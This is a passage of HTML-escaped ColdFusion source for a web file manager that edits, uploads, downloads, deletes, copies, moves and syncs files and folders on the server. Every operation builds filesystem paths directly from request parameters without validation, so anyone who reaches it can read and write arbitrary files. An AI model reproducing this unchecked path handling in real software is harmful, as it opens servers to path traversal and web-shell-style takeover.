              &lt;cfoutput&gt;<br>

              &lt;tr&gt;<br>

              &lt;td colspan=&quot;#colspan#&quot;&gt;&lt;hr size=&quot;1&quot;&gt;&lt;/td&gt;<br>

              &lt;td align=&quot;center&quot;&gt;&lt;b&gt;F i l e s&lt;/b&gt;&lt;/td&gt;<br>

              &lt;td colspan=&quot;10&quot;&gt;&lt;hr size=&quot;1&quot;&gt;&lt;/td&gt;<br>

              &lt;/tr&gt;<br>

              &lt;/cfoutput&gt;<br>

              &lt;cfoutput query=&quot;attributes.getDir&quot;&gt;<br>

              &lt;cfif type eq &quot;file&quot;&gt;<br>

              &lt;cfset i = i + 1&gt;<br>

              &lt;tr bgcolor=&quot;#iif(evaluate(i Mod 2),&quot;'F2F2F2'&quot;,&quot;'EFEFE2'&quot;)#&quot;&gt;<br>

              &lt;td&gt;#i#.&lt;/td&gt;<br>

              &lt;cfif attributes.showpath&gt;<br>

              &lt;td&gt;&lt;a href=&quot;?path=#path#&h=#attributes.h#&quot; style=&quot;text-decoration:none&quot;&gt;#path#&lt;/a&gt;&lt;/td&gt;<br>

              &lt;td&gt;&lt;a href=&quot;?fuseaction=download&path=#path#&file=#name#&h=#attributes.h#&quot; style=&quot;text-decoration:none&quot;&gt;&lt;b&gt;#name#&lt;/b&gt;&lt;/a&gt;&lt;/td&gt;<br>

              &lt;cfif attributes.editExtensions eq &quot;ALL&quot; or listFindNoCase(attributes.editExtensions,listLast(name,&quot;.&quot;))&gt;<br>

              &lt;td&gt;<br>

              &lt;a onclick=&quot;window.location.href='?fuseaction=edit&path=#JSStringFormat(path)#&h=#attributes.h#&file=#name#'&quot; class=&quot;button&quot;&gt;Edit&lt;/a&gt;<br>

              &lt;a onclick=&quot;window.location.href='?fuseaction=download&path=#JSStringFormat(path)#&h=#attributes.h#&file=#name#'&quot; class=&quot;button&quot;&gt;Down.&lt;/a&gt;<br>

              &lt;/td&gt;<br>

              &lt;/cfif&gt;<br>

              &lt;cfelse&gt;<br>

              &lt;td&gt;&lt;a href=&quot;?fuseaction=download&path=#attributes.path#&file=#name#&h=#attributes.h#&quot; style=&quot;text-decoration:none&quot;&gt;#name#&lt;/a&gt;&lt;/td&gt;<br>

              &lt;td&gt;<br>

              &lt;a onclick=&quot;window.location.href='?fuseaction=download&path=#JSStringFormat(attributes.path)#&h=#attributes.h#&file=#name#'&quot; class=&quot;button&quot;&gt;Down.&lt;/a&gt;<br>

              &lt;a onclick=&quot;renameFile('#name#')&quot; class=&quot;button&quot;&gt;Rename&lt;/a&gt;<br>

              &lt;a onclick=&quot;copyFile('#name#')&quot; class=&quot;button&quot;&gt;Copy&lt;/a&gt;<br>

              &lt;a onclick=&quot;moveFile('#name#')&quot; class=&quot;button&quot;&gt;Move&lt;/a&gt;<br>

              &lt;a onclick=&quot;deleteFile('#name#')&quot; class=&quot;button&quot; style=&quot;color:red&quot;&gt;Delete&lt;/a&gt;<br>

              &lt;cfif attributes.editExtensions eq &quot;ALL&quot; or listFindNoCase(attributes.editExtensions,listLast(name,&quot;.&quot;))&gt;<br>

              &lt;a onclick=&quot;window.location.href='?fuseaction=edit&path=#JSStringFormat(attributes.path)#&h=#attributes.h#&file=#name#'&quot; class=&quot;button&quot;&gt;Edit&lt;/a&gt;<br>

              &lt;/cfif&gt;<br>

              &lt;cfif Find(&quot;R&quot;,attributes)&gt;<br>

              &lt;a onclick=&quot;window.location.href='?fuseaction=removeR&path=#JSStringFormat(attributes.path)#&file=#name#&fileNew=#name#&h=#attributes.h#'&quot; class=&quot;button&quot;&gt;Rem RO&lt;/a&gt; <br>

              &lt;/cfif&gt;<br>

              &lt;/td&gt;<br>

              &lt;/cfif&gt;<br>

              &lt;td align=&quot;right&quot;&gt;#numberFormat(size)# B&lt;/td&gt;<br>

              &lt;td&gt;#ATTRIBUTES#&nbsp;&lt;/td&gt;<br>

              &lt;td&gt;#DATELASTMODIFIED#&lt;/td&gt;<br>

              &lt;/tr&gt;<br>

              &lt;/cfif&gt;<br>

              &lt;/cfoutput&gt;<br>

              &lt;/table&gt;<br>

              &lt;/cfcase&gt;<br>

              <br>

              &lt;cfcase value=&quot;edit&quot;&gt;<br>

              &lt;cfoutput&gt;&lt;title&gt;FileManager: #attributes.file#&lt;/title&gt;&lt;/cfoutput&gt;<br>

              &lt;cffile action=&quot;READ&quot; file=&quot;#attributes.path##attributes.delimiter##attributes.file#&quot; variable=&quot;filecontent&quot;&gt;<br>

              &lt;cfdirectory action=&quot;LIST&quot; directory=&quot;#attributes.path##attributes.delimiter#&quot; filter=&quot;#attributes.file#&quot; name=&quot;getFile&quot;&gt;<br>

              &lt;cfif findNoCase(&quot;R&quot;,getFile.attributes[1])&gt;<br>

              &lt;cfoutput&gt;<br>

              &lt;div&gt;<br>

              &lt;span style=&quot;color:red;font-weight:bold&quot;&gt;This file is READ-ONLY&lt;/span&gt;<br>

              &nbsp;&lt;button onclick=&quot;window.location.href='?fuseaction=removeR&path=#JSStringFormat(attributes.path)#&file=#attributes.file#&fileNew=#attributes.file#&after=edit&h=#attributes.h#'&quot; style=&quot;width:150&quot;&gt;Remove Read-Only&lt;/button&gt; <br>

              &nbsp;&lt;button onclick=&quot;history.back()&quot;&gt;Back&lt;/button&gt;<br>

              &lt;/div&gt;<br>

              &lt;pre style=&quot;width:100%;height:95%;border:2 solid black&quot;&gt;#htmlEditFormat(filecontent)#&lt;/pre&gt;<br>

              &lt;/cfoutput&gt;<br>

              &lt;cfelse&gt;<br>

              &lt;cfoutput&gt;<br>

              &lt;form action=&quot;?&quot; method=&quot;post&quot;&gt;<br>

              &lt;input type=&quot;submit&quot; value=&quot;Save Back&quot; style=&quot;width:100&quot; class=&quot;button&quot;&gt; <br>

              &lt;input type=&quot;submit&quot; value=&quot;Save&quot; onclick=&quot;document.all.fuseactionNext.value='edit'&quot; class=&quot;button&quot;&gt;&nbsp;<br>

              &lt;button onclick=&quot;window.location.href='?path=#JSStringFormat(attributes.path)#&h=#attributes.h#&file=#attributes.file#'&quot;&gt;Cancel&lt;/button&gt;<br>

              Size: #numberFormat(getFile.size)#B | Date: #getFile.dateLastModified#<br>

              &lt;input type=&quot;hidden&quot; name=&quot;h&quot; value=&quot;#attributes.h#&quot;&gt;<br>

              &lt;input type=&quot;hidden&quot; name=&quot;fuseaction&quot; value=&quot;write&quot;&gt;<br>

              &lt;input type=&quot;hidden&quot; name=&quot;fuseactionNext&quot; value=&quot;home&quot;&gt;<br>

              &lt;input type=&quot;hidden&quot; name=&quot;path&quot; value=&quot;#attributes.path#&quot;&gt;<br>

              &lt;input type=&quot;hidden&quot; name=&quot;file&quot; value=&quot;#attributes.file#&quot;&gt;<br>

              &lt;textarea style=&quot;width:100%;height:95%&quot; name=&quot;fileNewContent&quot; style=&quot;font-size:11px&quot;&gt;#htmlEditFormat(filecontent)#&lt;/textarea&gt;<br>

              &lt;div&gt;<br>

              &lt;input type=&quot;submit&quot; value=&quot;Save Back&quot; style=&quot;width:100&quot; class=&quot;button&quot;&gt;<br>

              &lt;input type=&quot;submit&quot; value=&quot;Save&quot; onclick=&quot;document.all.fuseactionNext.value='edit'&quot; class=&quot;button&quot;&gt;&nbsp;<br>

              &lt;button onclick=&quot;window.location.href='?path=#JSStringFormat(attributes.path)#&h=#attributes.h#&file=#attributes.file#'&quot;&gt;Cancel&lt;/button&gt;<br>

              &lt;/div&gt;<br>

              &lt;/form&gt;<br>

              &lt;/cfoutput&gt;<br>

              &lt;/cfif&gt;<br>

              &lt;/cfcase&gt;<br>

              <br>

              &lt;cfcase value=&quot;write&quot;&gt;<br>

              &lt;cftry&gt; <br>

              &lt;cffile action=&quot;DELETE&quot; file=&quot;#attributes.path##attributes.delimiter##attributes.file#&quot;&gt;<br>

              &lt;cffile action=&quot;WRITE&quot; file=&quot;#attributes.path##attributes.delimiter##attributes.file#&quot; output=&quot;#attributes.fileNewContent#&quot; addnewline=&quot;No&quot;&gt;<br>

              &lt;cfoutput&gt;#loc(&quot;fuseaction=#attributes.fuseactionNext#&file=#attributes.file#&quot;, attributes.relocate)#&lt;/cfoutput&gt;<br>

              &lt;cfcatch&gt;<br>

              &lt;cfoutput&gt;#loc(&quot;msg=Error while updating file!&quot;, attributes.relocate)#&lt;/cfoutput&gt;<br>

              &lt;/cfcatch&gt;<br>

              &lt;/cftry&gt;<br>

              &lt;/cfcase&gt;<br>

              <br>

              &lt;cfcase value=&quot;upload&quot;&gt;<br>

              &lt;cfset msg = &quot;Upload Result:&quot;&gt;<br>

              &lt;cfloop index=&quot;i&quot; from=&quot;1&quot; to=&quot;#attributes.nbrOfUpload#&quot;&gt;<br>

              &lt;cfif form[&quot;file#i#&quot;] neq &quot;&quot;&gt;<br>

              &lt;cftry&gt;<br>

              &lt;cffile action=&quot;UPLOAD&quot;<br>

              filefield=&quot;form.file#i#&quot; <br>

              destination=&quot;#attributes.path#&quot;<br>

              nameconflict=&quot;#iif(isDefined(&quot;attributes.overwrite#i#&quot;),&quot;'OVERWRITE'&quot;,&quot;'Error'&quot;)#&quot;&gt;<br>

              &lt;cfset msg = &quot;#msg#\n - File #i#: OK&quot;&gt;<br>

              &lt;cfcatch&gt;<br>

              &lt;cfset msg = &quot;#msg#\n - File #i#: ERROR&quot;&gt;<br>

              &lt;/cfcatch&gt; <br>

              &lt;/cftry&gt;<br>

              &lt;/cfif&gt;<br>

              &lt;/cfloop&gt;<br>

              &lt;cfoutput&gt;#loc(&quot;&quot;, attributes.relocate)#&lt;/cfoutput&gt;<br>

              &lt;/cfcase&gt;<br>

              <br>

              &lt;cfcase value=&quot;download&quot;&gt;<br>

              &lt;cfheader name=&quot;Content-disposition&quot; value=&quot;attachment; filename=#attributes.file#&quot;&gt;<br>

              &lt;cfcontent file=&quot;#attributes.path##attributes.delimiter##attributes.File#&quot;&gt;<br>

              &lt;/cfcase&gt;<br>

              <br>

              &lt;cfcase value=&quot;deleteFile&quot;&gt;<br>

              &lt;cftry&gt;<br>

              &lt;cffile action=&quot;delete&quot; file=&quot;#attributes.path##attributes.delimiter##attributes.file#&quot;&gt;<br>

              &lt;cfoutput&gt;#loc(&quot;msg=File deleted!&quot;, attributes.relocate)#&lt;/cfoutput&gt;<br>

              &lt;cfcatch&gt;<br>

              &lt;cfoutput&gt;#loc(&quot;msg=Error: file not deleted!&quot;, attributes.relocate)#&lt;/cfoutput&gt;<br>

              &lt;/cfcatch&gt;<br>

              &lt;/cftry&gt;<br>

              &lt;/cfcase&gt;<br>

              <br>

              &lt;cfcase value=&quot;deleteDir&quot;&gt;<br>

              &lt;cftry&gt;<br>

              &lt;cfdirectory action=&quot;DELETE&quot; directory=&quot;#attributes.path##attributes.delimiter##attributes.dir#&quot;&gt;<br>

              &lt;cfoutput&gt;#loc(&quot;msg=Folder deleted!&quot;, attributes.relocate)#&lt;/cfoutput&gt;<br>

              &lt;cfcatch&gt;<br>

              &lt;cfoutput&gt;#loc(&quot;fuseaction=deletedirRecursiveConfirm&dir=#attributes.dir#&quot;, attributes.relocate)#&lt;/cfoutput&gt;<br>

              &lt;/cfcatch&gt;<br>

              &lt;/cftry&gt;<br>

              &lt;/cfcase&gt;<br>

              <br>

              &lt;cfcase value=&quot;deleteDirRecursiveConfirm&quot;&gt;<br>

              &lt;cfoutput&gt;<br>

              &lt;script&gt;<br>

              if(confirm(&quot;Folder not deleted. It may contains files or folders.\nTry recursive delete?&quot;)) window.location.href=&quot;?fuseaction=deletedirRecursive&path=#jsStringFormat(attributes.path)#&dir=#jsStringFormat(attributes.dir)#&h=#attributes.h#&quot;;<br>

              else window.location.href=&quot;?path=#jsStringFormat(attributes.path)#&h=#attributes.h#&quot;;<br>

              &lt;/script&gt;<br>

              &lt;/cfoutput&gt;<br>

              &lt;/cfcase&gt;<br>

              <br>

              &lt;cfcase value=&quot;deleteDirRecursive&quot;&gt;<br>

              &lt;cfdirectory action=&quot;LIST&quot; name=&quot;attributes.getDir&quot; directory=&quot;#attributes.path##attributes.delimiter##attributes.dir#&quot;&gt;<br>

              &lt;cfoutput&gt;&lt;h3&gt;#attributes.path##attributes.delimiter##attributes.dir#&lt;/h3&gt;&lt;/cfoutput&gt;<br>

              &lt;!--- Delete files ---&gt;<br>

              &lt;cfloop query=&quot;attributes.getDir&quot;&gt;<br>

              &lt;cfif type eq &quot;file&quot;&gt;<br>

              &lt;cftry&gt;<br>

              &lt;cffile action=&quot;delete&quot; file=&quot;#attributes.path##attributes.delimiter##attributes.dir##attributes.delimiter##name#&quot;&gt;<br>

              &lt;cfoutput&gt;<br>

              &lt;div&gt;<br>

              &lt;span style=&quot;width:100&quot;&gt;FILE:&lt;/span&gt;<br>

              #attributes.path##attributes.delimiter##attributes.dir##attributes.delimiter#&lt;b&gt;#name#&lt;/b&gt;<br>

              &lt;/div&gt;<br>

              &lt;/cfoutput&gt;<br>

              &lt;cfcatch/&gt;<br>

              &lt;/cftry&gt;<br>

              &lt;/cfif&gt;<br>

              &lt;/cfloop&gt;<br>

              &lt;!--- Delete sub-folder ---&gt;<br>

              &lt;cfloop query=&quot;attributes.getDir&quot;&gt;<br>

              &lt;cfif type eq &quot;dir&quot;&gt;<br>

              &lt;cfmodule template=&quot;#attributes.thisModule#&quot;<br>

              fuseaction=&quot;deleteDirRecursive&quot;<br>

              h=&quot;#attributes.H#&quot;<br>

              path=&quot;#attributes.path##attributes.delimiter##attributes.dir#&quot;<br>

              dir=&quot;#name#&quot;<br>

              relocate=&quot;0&quot;&gt;<br>

              &lt;/cfif&gt;<br>

              &lt;/cfloop&gt;<br>

              &lt;cftry&gt;<br>

              &lt;cfdirectory action=&quot;DELETE&quot; directory=&quot;#attributes.path##attributes.delimiter##attributes.dir#&quot;&gt;<br>

              &lt;cfoutput&gt;<br>

              &lt;div&gt;<br>

              &lt;span style=&quot;width:100&quot;&gt;FOLDER:&lt;/span&gt;<br>

              #attributes.path##attributes.delimiter#&lt;b&gt;#attributes.dir#&lt;/b&gt;<br>

              &lt;/div&gt;<br>

              &lt;/cfoutput&gt;<br>

              &lt;cfcatch/&gt;<br>

              &lt;/cftry&gt;<br>

              &lt;cfflush&gt;<br>

              &lt;cfif attributes.relocate&gt;<br>

              &lt;cfoutput&gt;<br>

              &lt;button name=&quot;fileManagerButton&quot; style=&quot;width:700&quot; onclick=&quot;window.location.href='?h=#attributes.H#&path=#jsStringFormat(attributes.path)#'&quot;&gt;Deletion done! Back to &lt;b&gt;#attributes.path#&lt;/b&gt;&lt;/button&gt;<br>

              &lt;/cfoutput&gt;<br>

              &lt;/cfif&gt;<br>

              &lt;/cfcase&gt;<br>

              <br>

              &lt;cfcase value=&quot;addDir&quot;&gt;<br>

              &lt;cftry&gt;<br>

              &lt;cfdirectory action=&quot;CREATE&quot; directory=&quot;#attributes.path##attributes.delimiter##attributes.dirNew#&quot;&gt;<br>

              &lt;cfoutput&gt;#loc(&quot;msg=Folder created!&quot;, attributes.relocate)#&lt;/cfoutput&gt;<br>

              &lt;cfcatch&gt;<br>

              &lt;cfoutput&gt;#loc(&quot;msg=Error: folder not created!&quot;, attributes.relocate)#&lt;/cfoutput&gt;<br>

              &lt;/cfcatch&gt;<br>

              &lt;/cftry&gt;<br>

              &lt;/cfcase&gt;<br>

              <br>

              &lt;cfcase value=&quot;addFile&quot;&gt;<br>

              &lt;cftry&gt;<br>

              &lt;cffile action=&quot;WRITE&quot; file=&quot;#attributes.path##attributes.delimiter##attributes.fileNew#&quot; output=&quot;&quot;&gt;<br>

              &lt;cfoutput&gt;#loc(&quot;msg=File created!&quot;, attributes.relocate)#&lt;/cfoutput&gt;<br>

              &lt;cfcatch&gt;<br>

              &lt;cfoutput&gt;#loc(&quot;msg=Error: file not created!&quot;, attributes.relocate)#&lt;/cfoutput&gt;<br>

              &lt;/cfcatch&gt;<br>

              &lt;/cftry&gt;<br>

              &lt;/cfcase&gt;<br>

              <br>

              &lt;cfcase value=&quot;copyFile&quot;&gt;<br>

              &lt;cfif fileExists(&quot;#attributes.pathNew#&quot;)&gt;<br>

              &lt;cfoutput&gt;<br>

              &lt;script&gt;<br>

              alert(&quot;This file already exists!&quot;);<br>

              history.back();<br>

              &lt;/script&gt;<br>

              &lt;/cfoutput&gt;<br>

              &lt;cfabort&gt;<br>

              &lt;/cfif&gt;<br>

              &lt;cftry&gt;<br>

              &lt;cfset pathTry = listDeleteAt(attributes.pathNew,listLen(attributes.pathNew,&quot;/\&quot;),&quot;/\&quot;)&gt;<br>

              &lt;cfdirectory action=&quot;CREATE&quot; directory=&quot;#pathTry#&quot;&gt;<br>

              &lt;cfcatch/&gt;<br>

              &lt;/cftry&gt;<br>

              &lt;cftry&gt;<br>

              &lt;cffile action=&quot;COPY&quot; source=&quot;#attributes.path##attributes.delimiter##attributes.file#&quot; <br>

              destination=&quot;#attributes.pathNew#&quot;&gt;<br>

              &lt;cfif attributes.relocate&gt;<br>

              &lt;cfoutput&gt;#loc(&quot;msg=File copied!&quot;, attributes.relocate)#&lt;/cfoutput&gt;<br>

              &lt;/cfif&gt;<br>

              &lt;cfcatch&gt;<br>

              &lt;cfif attributes.relocate&gt;<br>

              &lt;cfoutput&gt;#loc(&quot;msg=Error: file not copied&quot;, attributes.relocate)#&lt;/cfoutput&gt;<br>

              &lt;/cfif&gt;<br>

              &lt;/cfcatch&gt;<br>

              &lt;/cftry&gt;<br>

              &lt;/cfcase&gt;<br>

              <br>

              &lt;cfcase value=&quot;copyDir&quot;&gt;<br>

              &lt;cfif DirectoryExists(&quot;#attributes.pathNew#&quot;)&gt;<br>

              &lt;cfoutput&gt;<br>

              &lt;script&gt;<br>

              alert(&quot;This folder already exists!\nPlease use synchronize function.&quot;);<br>

              history.back();<br>

              &lt;/script&gt;<br>

              &lt;/cfoutput&gt;<br>

              &lt;cfabort&gt;<br>

              &lt;/cfif&gt;<br>

              &lt;cfdirectory directory=&quot;#attributes.path##attributes.delimiter##attributes.dir#&quot; name=&quot;attributes.getDir&quot;&gt;<br>

              &lt;!--- create main folder ---&gt;<br>

              &lt;cftry&gt;<br>

              &lt;cfdirectory action=&quot;CREATE&quot; directory=&quot;#attributes.pathNew#&quot;&gt;<br>

              &lt;cfoutput&gt;&lt;h3&gt;#attributes.pathNew#&lt;/h3&gt;&lt;/cfoutput&gt;<br>

              &lt;cfcatch/&gt;<br>

              &lt;/cftry&gt;<br>

              &lt;!--- copy folder content - Recursive copy ---&gt;<br>

              &lt;cfloop query=&quot;attributes.getDir&quot;&gt;<br>

              &lt;cfif type eq &quot;file&quot;&gt;<br>

              &lt;cffile <br>

              action=&quot;COPY&quot; <br>

              source=&quot;#attributes.path##attributes.delimiter##attributes.dir##attributes.delimiter##name#&quot; <br>

              destination=&quot;#attributes.pathNew##attributes.delimiter##name#&quot;<br>

              attributes=&quot;Normal&quot;&gt;<br>

              &lt;cfoutput&gt;&lt;div&gt;#attributes.pathNew##attributes.delimiter#&lt;b&gt;#name#&lt;/b&gt;&lt;/div&gt;&lt;/cfoutput&gt;<br>

              &lt;cfflush&gt;<br>

              &lt;/cfif&gt;<br>

              &lt;/cfloop&gt;<br>

              &lt;cfloop query=&quot;attributes.getDir&quot;&gt;<br>

              &lt;cfif type eq &quot;dir&quot;&gt;<br>

              &lt;cfmodule <br>

              fuseaction=&quot;copyDir&quot;<br>

              template=&quot;#attributes.thisModule#&quot; <br>

              h=&quot;#attributes.H#&quot;<br>

              path=&quot;#attributes.path##attributes.delimiter##attributes.dir##attributes.delimiter#&quot;<br>

              dir=&quot;#name#&quot;<br>

              pathNew=&quot;#attributes.pathNew##attributes.delimiter##name#&quot;<br>

              relocate=&quot;0&quot;&gt;<br>

              &lt;/cfif&gt;<br>

              &lt;/cfloop&gt;<br>

              &lt;cfif attributes.relocate&gt;<br>

              &lt;cfoutput&gt;<br>

              &lt;button name=&quot;fileManagerButton&quot; style=&quot;width:700&quot; onclick=&quot;window.location.href='?h=#attributes.H#&path=#jsStringFormat(attributes.path)#'&quot;&gt;Copy done! Back to &lt;b&gt;#attributes.path#&lt;/b&gt;&lt;/button&gt;<br>

              &lt;/cfoutput&gt;<br>

              &lt;/cfif&gt;<br>

              &lt;/cfcase&gt;<br>

              <br>

              &lt;cfcase value=&quot;renameFile&quot;&gt;<br>

              &lt;cfif fileExists(&quot;#attributes.path##attributes.delimiter##attributes.fileNew#&quot;)&gt;<br>

              &lt;cfoutput&gt;<br>

              &lt;script&gt;<br>

              alert(&quot;This file already exists!&quot;);<br>

              history.back();<br>

              &lt;/script&gt;<br>

              &lt;/cfoutput&gt;<br>

              &lt;cfabort&gt;<br>

              &lt;/cfif&gt;<br>

              &lt;cftry&gt;<br>

              &lt;cffile action=&quot;rename&quot; source=&quot;#attributes.path##attributes.delimiter##attributes.file#&quot; destination=&quot;#attributes.path##attributes.delimiter##attributes.fileNew#&quot; attributes=&quot;normal&quot;&gt;<br>

              &lt;cfoutput&gt;#loc(&quot;msg=File updated!&quot;, attributes.relocate)#&lt;/cfoutput&gt;<br>

              &lt;cfcatch&gt;<br>

              &lt;cfoutput&gt;#loc(&quot;msg=Error while updating file!&quot;, attributes.relocate)#&lt;/cfoutput&gt;<br>

              &lt;/cfcatch&gt;<br>

              &lt;/cftry&gt;<br>

              &lt;/cfcase&gt;</p>

    <p> &lt;cfcase value=&quot;removeR&quot;&gt;<br>

              &lt;cftry&gt;<br>

              &lt;cffile action=&quot;rename&quot; source=&quot;#attributes.path##attributes.delimiter##attributes.file#&quot; destination=&quot;#attributes.path##attributes.delimiter##attributes.fileNew#&quot; attributes=&quot;normal&quot;&gt;<br>

              &lt;cfset qs = &quot;&quot;&gt;<br>

              &lt;cfif isDefined(&quot;attributes.after&quot;) and attributes.after eq &quot;edit&quot;&gt;<br>

              &lt;cfset qs = &quot;fuseaction=edit&file=#attributes.file#&&quot;&gt;<br>

              &lt;/cfif&gt;<br>

              &lt;cfoutput&gt;#loc(&quot;#qs#msg=File updated!&quot;, attributes.relocate)#&lt;/cfoutput&gt;<br>

              &lt;cfcatch&gt;<br>

              &lt;cfoutput&gt;#loc(&quot;#qs#msg=Error while updating file!&quot;, attributes.relocate)#&lt;/cfoutput&gt;<br>

              &lt;/cfcatch&gt;<br>

              &lt;/cftry&gt;<br>

              &lt;/cfcase&gt;<br>

              <br>

              &lt;cfcase value=&quot;renameDir&quot;&gt;<br>

              &lt;cfif DirectoryExists(&quot;#attributes.path##attributes.delimiter##attributes.dirNew#&quot;)&gt;<br>

              &lt;cfoutput&gt;<br>

              &lt;script&gt;<br>

              alert(&quot;This folder already exists!&quot;);<br>

              history.back();<br>

              &lt;/script&gt;<br>

              &lt;/cfoutput&gt;<br>

              &lt;cfabort&gt;<br>

              &lt;/cfif&gt;<br>

              &lt;h2&gt;Rename folder - step 1: copy files&lt;/h2&gt;<br>

              &lt;cfmodule template=&quot;#attributes.thisModule#&quot;<br>

              fuseaction=&quot;copyDir&quot;<br>

              h=&quot;#attributes.h#&quot;<br>

              path=&quot;#attributes.path#&quot;<br>

              pathOrigin=&quot;#attributes.path##attributes.delimiter##attributes.dir#&quot;<br>

              pathNew=&quot;#attributes.path##attributes.delimiter##attributes.dirNew#&quot;<br>

              relocate=&quot;0&quot;&gt;<br>

              &lt;h2&gt;Rename folder - step 2: delete files&lt;/h2&gt;<br>

              &lt;cfmodule template=&quot;#attributes.thisModule#&quot;<br>

              fuseaction=&quot;deleteDirRecursive&quot;<br>

              h=&quot;#attributes.h#&quot;<br>

              path=&quot;#attributes.path#&quot;<br>

              dir=&quot;#attributes.dir#&quot;<br>

              relocate=&quot;0&quot;&gt;<br>

              &lt;cfif attributes.relocate&gt;<br>

              &lt;cfoutput&gt;<br>

              &lt;button name=&quot;fileManagerButton&quot; style=&quot;width:700&quot; onclick=&quot;window.location.href='?path=#jsStringFormat(attributes.path)#&h=#attributes.H#'&quot;&gt;Rename done! Back to &lt;b&gt;#attributes.path#&lt;/b&gt;&lt;/button&gt;<br>

              &lt;/cfoutput&gt;<br>

              &lt;/cfif&gt;<br>

              &lt;/cfcase&gt;</p>

    <p> &lt;cfcase value=&quot;moveFile&quot;&gt;<br>

              &lt;h2&gt;Move file - step 1: copy file&lt;/h2&gt;<br>

              &lt;cfmodule template=&quot;#attributes.thisModule#&quot;<br>

              fuseaction=&quot;copyFile&quot;<br>

              h=&quot;#attributes.h#&quot;<br>

              path=&quot;#attributes.path#&quot;<br>

              file=&quot;#attributes.file#&quot;<br>

              pathNew=&quot;#attributes.pathNew#&quot;<br>

              relocate=&quot;0&quot;&gt;<br>

              &lt;h2&gt;Move file - step 2: delete file&lt;/h2&gt;<br>

              &lt;cfmodule template=&quot;#attributes.thisModule#&quot;<br>

              fuseaction=&quot;deleteFile&quot;<br>

              h=&quot;#attributes.h#&quot;<br>

              path=&quot;#attributes.path#&quot;<br>

              file=&quot;#attributes.file#&quot;<br>

              relocate=&quot;0&quot;&gt;<br>

              &lt;cfoutput&gt;#loc(&quot;msg=File moved!&quot;, attributes.relocate)#&lt;/cfoutput&gt;<br>

              &lt;/cfcase&gt;<br>

              <br>

              &lt;cfcase value=&quot;moveDir&quot;&gt;<br>

              &lt;h1&gt;Move folder - step 1: copy files&lt;/h1&gt;<br>

              &lt;cfmodule template=&quot;#attributes.thisModule#&quot;<br>

              fuseaction=&quot;copyDir&quot;<br>

              h=&quot;#attributes.h#&quot;<br>

              pathOrigin=&quot;#attributes.path##attributes.delimiter##attributes.dir#&quot;<br>

              pathNew=&quot;#attributes.pathNew##attributes.delimiter##attributes.dir#&quot;<br>

              relocate=&quot;0&quot;&gt;<br>

              &lt;h1&gt;Move folder - step 2: delete files&lt;/h1&gt;<br>

              &lt;cfmodule template=&quot;#attributes.thisModule#&quot;<br>

              fuseaction=&quot;deleteDirRecursive&quot;<br>

              h=&quot;#attributes.h#&quot;<br>

              path=&quot;#attributes.path#&quot;<br>

              dir=&quot;#attributes.dir#&quot;<br>

              relocate=&quot;0&quot;&gt;<br>

              &lt;cfif attributes.relocate&gt;<br>

              &lt;cfoutput&gt;<br>

              &lt;button name=&quot;fileManagerButton&quot; style=&quot;width:700&quot; onclick=&quot;window.location.href='?h=#attributes.H#&path=#jsStringFormat(attributes.path)#'&quot;&gt;Move done! Back to &lt;b&gt;#attributes.path#&lt;/b&gt;&lt;/button&gt;<br>

              &lt;/cfoutput&gt;<br>

              &lt;/cfif&gt;<br>

              &lt;/cfcase&gt;<br>

              <br>

              &lt;cfcase value=&quot;syncDir&quot;&gt;<br>

              &lt;cfif attributes.relocate&gt;<br>

              &lt;cfoutput&gt;&lt;h1&gt;Synchronize&lt;/h1&gt;&lt;h3&gt;From... #attributes.path#&lt;/h3&gt;&lt;h3&gt;To... #attributes.pathNew#&lt;/h3&gt;&lt;hr&gt;&lt;/cfoutput&gt;<br>

              &lt;/cfif&gt;<br>

              &lt;cfdirectory directory=&quot;#attributes.path#&quot; name=&quot;getDir&quot;&gt;<br>

              &lt;cfdirectory directory=&quot;#attributes.pathNew#&quot; name=&quot;getDirNew&quot;&gt;<br>

              &lt;!--- create main folder ---&gt;<br>

              &lt;cftry&gt;<br>

              &lt;cfdirectory action=&quot;CREATE&quot; directory=&quot;#attributes.pathNew#&quot;&gt;<br>

              &lt;cfoutput&gt;&lt;h3 style=&quot;color:green&quot;&gt;#attributes.pathNew# ... created!&lt;/h3&gt;&lt;/cfoutput&gt;<br>

              &lt;cfcatch&gt;&lt;cfoutput&gt;&lt;h3&gt;#attributes.pathNew# ... existing!&lt;/h3&gt;&lt;/cfoutput&gt;&lt;/cfcatch&gt;<br>

              &lt;/cftry&gt;<br>

              &lt;!--- copy folder content - Recursive copy ---&gt;<br>

              &lt;cfloop query=&quot;getDir&quot;&gt;<br>

              &lt;cfset getDirCurrentRow = getDir.currentRow&gt;<br>

              &lt;cfif type eq &quot;file&quot;&gt;<br>

              &lt;cfset fileExists = 0&gt;<br>

              &lt;!--- Check if file exists ---&gt;<br>

              &lt;cfloop query=&quot;getDirNew&quot;&gt;<br>

              &lt;cfset getDirNewCurrentRow = getDirNew.currentRow&gt;<br>

              &lt;cfif getDir.name[getDirCurrentRow] eq getDirNew.name[getDirNewCurrentRow]&gt;<br>

              &lt;cfset fileExists = 1&gt;<br>

              &lt;cfset fileIsModified = 0&gt;<br>

              &lt;cfif getDir.DATELASTMODIFIED[getDirCurrentRow] gt getDirNew.DATELASTMODIFIED[getDirNewCurrentRow]&gt;<br>

              &lt;cfset fileIsModified = 1&gt;<br>

              &lt;/cfif&gt;<br>

              &lt;cfbreak&gt;<br>

              &lt;/cfif&gt;<br>

              &lt;/cfloop&gt;<br>

              &lt;!--- action ---&gt;<br>

              &lt;cfif fileExists&gt;<br>

              &lt;cfif fileIsModified or attributes.overwriteAll&gt;<br>

              &lt;cftry&gt;<br>

              &lt;cffile action=&quot;DELETE&quot; file=&quot;#attributes.pathNew##attributes.delimiter##name#&quot;&gt;<br>

              &lt;cffile<br>

              action=&quot;COPY&quot; <br>

              source=&quot;#attributes.path##attributes.delimiter##name#&quot; <br>

              destination=&quot;#attributes.pathNew##attributes.delimiter##name#&quot;<br>

              attributes=&quot;Normal&quot;&gt;<br>

              &lt;cfoutput&gt;&lt;div style=&quot;color:orange&quot;&gt;#attributes.pathNew##attributes.delimiter#&lt;b&gt;#name#&lt;/b&gt; ... updated!&lt;/div&gt;&lt;/cfoutput&gt;<br>

              &lt;cfcatch&gt;<br>

              &lt;cfoutput&gt;&lt;div style=&quot;color:red&quot;&gt;#attributes.pathNew##attributes.delimiter#&lt;b&gt;#name#&lt;/b&gt; ... cannot update!&lt;/div&gt;&lt;/cfoutput&gt;<br>

              &lt;/cfcatch&gt;<br>

              &lt;/cftry&gt;<br>

              &lt;cfelse&gt;<br>

